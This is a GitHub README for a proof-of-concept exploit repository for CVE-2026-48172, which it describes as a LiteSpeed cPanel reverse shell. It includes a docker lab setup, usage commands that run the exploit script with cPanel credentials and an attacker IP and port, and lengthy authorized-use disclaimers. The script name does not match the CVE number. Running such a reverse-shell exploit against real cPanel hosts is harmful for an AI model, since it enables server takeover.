HORKimhab/CVE-2026-48172

# 📚 Educational Security Research Repository A repository for learning, testing, and researching cybersecurity concepts in controlled environments. ## ⚡ Simple Usage Use this project only in safe and authorized environments such as: - Local virtual machines - Docker containers - Isolated lab setups - Authorized penetration testing environments Example setup: git clone https://github.com/HORKimhab/CVE-2026-48172 && cd CVE-2026-48172 cd lab docker compose up --build -d cd .. Example usage: # For localhost (uses HTTP automatically) python3 cve-2026-48712.py -u test -p test -H localhost:2083 -i 192.168.1.100 # For remote server (uses HTTPS) python3 cve-2026-48712.py -u test -p test -H example.com:2083 -i 192.168.1.100 usage: cve-2026-48712.py [-h] -u USER -p PASSWORD [-H HOST] -i ATTACKER_IP [-P ATTACKER_PORT] CVE-2026-48172 PoC - LiteSpeed cPanel Redis TLS Reverse Shell options: -h, --help show this help message and exit -u, --user USER cPanel username -p, --password PASSWORD cPanel password -H, --host HOST cPanel host with protocol and port (default: http://localhost:2083) -i, --attacker-ip ATTACKER_IP Your IP for reverse shell -P, --attacker-port ATTACKER_PORT Reverse shell port (default: 8443) Replace the commands above with your actual project setup steps. ## Credit or Reference - https://nvd.nist.gov/vuln/detail/CVE-2026-48172 - https://thehackernews.com/2026/05/litespeed-cpanel-plugin-cve-2026-48172.html - https://www.cve.org/CVERecord?id=CVE-2026-48172 ## ⚠️ Security & Legal Disclaimer ## Purpose This repository is for **educational and authorized security research only**. It is designed to help users learn about: - Security vulnerabilities - Sandbox and isolation concepts - Secure coding and defensive practices ## Authorized Use Only Use this repository only in environments where you have permission, such as: - Personal labs or virtual machines - Docker or isolated environments - Authorized penetration testing - Cybersecurity training or academic research Unauthorized or illegal use is strictly prohibited. ## No Liability By using this repository, you agree that: - You are responsible for your own actions - You will use it legally and ethically - The project is provided **without warranty** ## Ethical Use This project is intended for: - Defensive security research - Cybersecurity education - Vulnerability awareness - Secure system and software research ## Contact For responsible disclosure or collaboration, contact the repository maintainer through GitHub.